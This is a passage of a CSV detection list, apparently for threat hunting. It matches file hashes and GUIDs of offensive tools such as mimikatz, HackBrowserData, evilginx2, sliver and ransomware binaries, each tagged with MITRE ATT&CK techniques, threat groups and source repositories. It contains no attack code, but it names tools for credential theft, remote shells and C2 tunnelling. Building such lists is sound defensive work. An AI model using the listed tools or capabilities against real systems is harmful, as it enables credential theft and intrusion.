"*a9830d372873174b5e855d0ba4b0f14912e007657bfe0bdcddae7f10e0ea7a03*",".{0,1000}a9830d372873174b5e855d0ba4b0f14912e007657bfe0bdcddae7f10e0ea7a03.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","32833" "*a9843a81603f299fb87f371052b47798338252b58ad8ef56dfee4bf462322eb6*",".{0,1000}a9843a81603f299fb87f371052b47798338252b58ad8ef56dfee4bf462322eb6.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","32834" 
"*a98576591e0e03e13239e35f8e02e30b71b6e4109f568a3d245af6ac67591699*",".{0,1000}a98576591e0e03e13239e35f8e02e30b71b6e4109f568a3d245af6ac67591699.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32835" "*a98576591e0e03e13239e35f8e02e30b71b6e4109f568a3d245af6ac67591699*",".{0,1000}a98576591e0e03e13239e35f8e02e30b71b6e4109f568a3d245af6ac67591699.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - 
Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32836" "*a98d565ced4a422049d3ff0ad22e9641af814a09187d5793b40899865733df99*",".{0,1000}a98d565ced4a422049d3ff0ad22e9641af814a09187d5793b40899865733df99.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32837" "*a990a9014445fe722f63624197fc0f319dbfd1e16a9b7fdcb49c5a6443a29d4b*",".{0,1000}a990a9014445fe722f63624197fc0f319dbfd1e16a9b7fdcb49c5a6443a29d4b.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","32838" 
"*a992acc4b4e48dd6cdc389dcaf2291b330854f0b17369b1429590d3f824c3dfe*",".{0,1000}a992acc4b4e48dd6cdc389dcaf2291b330854f0b17369b1429590d3f824c3dfe.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","32839" "*a998e3aa58debd0797b430649420e49ca0b1299a005900dfaf17f661facfe039*",".{0,1000}a998e3aa58debd0797b430649420e49ca0b1299a005900dfaf17f661facfe039.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","32840" "*a99b152752f479050ee12bde36fe6c85d3b07b0ee2b6e974abf287bfa2727916*",".{0,1000}a99b152752f479050ee12bde36fe6c85d3b07b0ee2b6e974abf287bfa2727916.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32841" "*A99F07FBB9AD4C798BBF570E4C3FEA33AB95E10479F204BE18041EC07BD8CFFF*",".{0,1000}A99F07FBB9AD4C798BBF570E4C3FEA33AB95E10479F204BE18041EC07BD8CFFF.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","32843" "*a9a231b0e4125b73e4aebf024857c6fd1bcada83dc74c6e328abd54ffa795cf1*",".{0,1000}a9a231b0e4125b73e4aebf024857c6fd1bcada83dc74c6e328abd54ffa795cf1.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","32844" "*A9A26EE65BEDB50FD71BF89819EFFBF42E06D40525928F125A161B6395CECB52*",".{0,1000}A9A26EE65BEDB50FD71BF89819EFFBF42E06D40525928F125A161B6395CECB52.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","32845" "*a9a5ff8b8ba4b09ce959ef85b523d43c5f34b8142acded5fa8a5444756780880*",".{0,1000}a9a5ff8b8ba4b09ce959ef85b523d43c5f34b8142acded5fa8a5444756780880.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32846" "*a9a8593db4e3f0d2b00c3683e029af751e6897bcb525fa0dc38777fe3bfb5c40*",".{0,1000}a9a8593db4e3f0d2b00c3683e029af751e6897bcb525fa0dc38777fe3bfb5c40.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32847" "*a9ada318adc60090587f06cac5d110f274f1fc75e7705c09fc27b8921aa32651*",".{0,1000}a9ada318adc60090587f06cac5d110f274f1fc75e7705c09fc27b8921aa32651.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32850" "*a9b13111606ca8ed948030515217c0e1af7cf2af2af8eb034999ff9e3f071b24*",".{0,1000}a9b13111606ca8ed948030515217c0e1af7cf2af2af8eb034999ff9e3f071b24.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","32851" "*a9b1d358b072c89b85d9d83f024233afcb32a226fa25ce0c10828db705a10dcf*",".{0,1000}a9b1d358b072c89b85d9d83f024233afcb32a226fa25ce0c10828db705a10dcf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32852" "*a9b3834be408b66c53b125a888e0f98899603fd79fcbe980dded3c6896d9bf34*",".{0,1000}a9b3834be408b66c53b125a888e0f98899603fd79fcbe980dded3c6896d9bf34.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32853" "*a9b451f93e8ead69f036bdc262bf7700b2d18789f081bf3c678da72233730cec*",".{0,1000}a9b451f93e8ead69f036bdc262bf7700b2d18789f081bf3c678da72233730cec.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32854" "*a9ba6f29ebb95e2e65f1e05b0f61d0a32a3bcd64d0589f35f41b69ba02d54ed8*",".{0,1000}a9ba6f29ebb95e2e65f1e05b0f61d0a32a3bcd64d0589f35f41b69ba02d54ed8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32856" "*a9bbb6cb0597d7f59a85f981550e52f148f023a0576434ba9396bc8f5eb3f989*",".{0,1000}a9bbb6cb0597d7f59a85f981550e52f148f023a0576434ba9396bc8f5eb3f989.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","32857" "*a9c25f6e6b4a7279424aba73343f268a385a18ca2c735b6e9869dbbaada3aecb*",".{0,1000}a9c25f6e6b4a7279424aba73343f268a385a18ca2c735b6e9869dbbaada3aecb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32858" "*a9d6d8e1051e28d933a3979f20e8fd7eb85611d2014502d093aa879681bbbc26*",".{0,1000}a9d6d8e1051e28d933a3979f20e8fd7eb85611d2014502d093aa879681bbbc26.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","0","#filehash","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","32864" "*a9d77bda6fcac6672b88c4252fce92bc9eb6a00186ace0173f02b72f336d3fec*",".{0,1000}a9d77bda6fcac6672b88c4252fce92bc9eb6a00186ace0173f02b72f336d3fec.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32865" "*a9e7d95771dd6c81e46c6c94aefd56695e8f824002532d7a53501fbe645d8ebf*",".{0,1000}a9e7d95771dd6c81e46c6c94aefd56695e8f824002532d7a53501fbe645d8ebf.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32866" "*A9EAA820-EC72-4052-80D0-A2CCBFCC83E6*",".{0,1000}A9EAA820\-EC72\-4052\-80D0\-A2CCBFCC83E6.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","32867" "*a9ecfb28564d208704c7463424adf0f1b0e10cbb789cfbb7bafc9e1edc8ec4cd*",".{0,1000}a9ecfb28564d208704c7463424adf0f1b0e10cbb789cfbb7bafc9e1edc8ec4cd.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","32868" 
"*a9f51500eba6088cde85a398ebe8d14f4fb52a931f9988049ab7e14570f39498*",".{0,1000}a9f51500eba6088cde85a398ebe8d14f4fb52a931f9988049ab7e14570f39498.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32869" "*a9f7d67e29c2b7f2059636c73945b9946185a235dfb12e346e07eb7b0650f714*",".{0,1000}a9f7d67e29c2b7f2059636c73945b9946185a235dfb12e346e07eb7b0650f714.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32870" "*aa013dcded3e67135ec91768764bc46d0509c78f061134e1a7917603fff3d6a8*",".{0,1000}aa013dcded3e67135ec91768764bc46d0509c78f061134e1a7917603fff3d6a8.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","32875" "*aa09c80172ca9e37f28d8da004771b57c2ba1eac4a8957b7b0422c0fcbd6f59d*",".{0,1000}aa09c80172ca9e37f28d8da004771b57c2ba1eac4a8957b7b0422c0fcbd6f59d.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - 
T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","32876" "*aa0daaab2228d5befff8982d5b44267a0272e971799dd77225449e005ec5d83e*",".{0,1000}aa0daaab2228d5befff8982d5b44267a0272e971799dd77225449e005ec5d83e.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","32877" "*aa12c40bc0ef87b1b706f1e9062d72d8c67c3b4b3347741efb38cf71817777d2*",".{0,1000}aa12c40bc0ef87b1b706f1e9062d72d8c67c3b4b3347741efb38cf71817777d2.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","32878" "*aa14822e2f2acd7b8aff1ebf1f2e7e9f800f6089f868ec7464af6ac01d7f9b3c*",".{0,1000}aa14822e2f2acd7b8aff1ebf1f2e7e9f800f6089f868ec7464af6ac01d7f9b3c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","32880" "*aa1b9c1ff92922f5a3d2119505c808c21e0cd2f6b6c5639eaafc84b875d8bbb6*",".{0,1000}aa1b9c1ff92922f5a3d2119505c808c21e0cd2f6b6c5639eaafc84b875d8bbb6.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32881" "*aa3939fc357723135870d5036b12a67097b03309*",".{0,1000}aa3939fc357723135870d5036b12a67097b03309.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","32884" "*aa3a685af2d72ed748f21a0190d6d08e226f717c8eea6b5694c2ad74a331a285*",".{0,1000}aa3a685af2d72ed748f21a0190d6d08e226f717c8eea6b5694c2ad74a331a285.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","32885" 
"*AA488748-3D0E-4A52-8747-AB42A7143760*",".{0,1000}AA488748\-3D0E\-4A52\-8747\-AB42A7143760.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","#GUIDproject","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","32886" "*aa4897e704cab54711515805dc9c40dccae5f3b913c120f643a6f7954396fae9*",".{0,1000}aa4897e704cab54711515805dc9c40dccae5f3b913c120f643a6f7954396fae9.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32887" "*aa5292f60e239072e657cd3a1ebd9604018aeeefc0835d4fc691c53c8e01886e*",".{0,1000}aa5292f60e239072e657cd3a1ebd9604018aeeefc0835d4fc691c53c8e01886e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32888" "*aa52afe3cfd41aa6bdc1601a8f5a8dc2f0cac8a7af2cc162bd569082a12aaefa*",".{0,1000}aa52afe3cfd41aa6bdc1601a8f5a8dc2f0cac8a7af2cc162bd569082a12aaefa.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","32889" "*AA5751006B1D1F18E8BD39F254DD31F26E1EC45FE6FC910B4BFCD0528A5ACBFD*",".{0,1000}AA5751006B1D1F18E8BD39F254DD31F26E1EC45FE6FC910B4BFCD0528A5ACBFD.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","32891" "*aa5838415ca20f0b6fe7858f457f129cf442940b3d4676cd243575809e53988e*",".{0,1000}aa5838415ca20f0b6fe7858f457f129cf442940b3d4676cd243575809e53988e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","32892" "*aa5ffd867153cca61f22d22f94fbe6e81416b0475f140ed6b546dcaba57d462d*",".{0,1000}aa5ffd867153cca61f22d22f94fbe6e81416b0475f140ed6b546dcaba57d462d.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
